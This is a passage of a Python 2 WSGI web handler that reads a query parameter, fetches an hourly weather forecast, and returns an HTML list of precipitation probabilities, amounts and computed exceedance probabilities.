        #https://gist.github.com/davidbgk/1311056
        d = parse_qs(environ['QUERY_STRING'])  # turns the qs to a dict

        query = 'From GET: %s' % ''.join('%s: %s' % (k, v)
                                         for k, v in d.iteritems())
        logger.info("Received message from worker: %s" % query)

        if 'pqpf' in d:

            parsed_json = get_forecast(url)

            hour = []
            pop = []
            qpf = []
            for x in range(0, len(parsed_json['hourly_forecast'])):
                hour.append(
                    time.strftime(
                        '%Y-%m-%d %H:%M',
                        time.gmtime(
                            float(parsed_json['hourly_forecast'][x]['FCTTIME']
                                  ['epoch']))))
                pop.append(
                    float(parsed_json['hourly_forecast'][x]['pop']) / 100)
                qpf.append(
                    float(parsed_json['hourly_forecast'][x]['qpf']
                          ['english']))  #'metric'

            poe = calc_pqpf(float(d['pqpf'][0]), pop, qpf)

            out = '<br>'
            for x in range(0, 12):
                out += "Forecast for %16s GMT.....POP %2d...QPF %4s...PoE(%.2f) %2.2f <br>" % (
                    hour[x], pop[x] * 100, qpf[x], float(
                        d['pqpf'][0]), poe[x] * 100)

            url_info['amt'] = d['pqpf'][0]
            url_info['pqpf_str'] = out

        else:

            url_info['amt'] = amt
            url_info[
                'pqpf_str'] = '<a href="?pqpf=0.2">Click</a> to Show Forecast'

    status = '200 OK'
    headers = [('Content-type', 'text/html')]

    start_response(status, headers)

    return [response.format(**url_info)]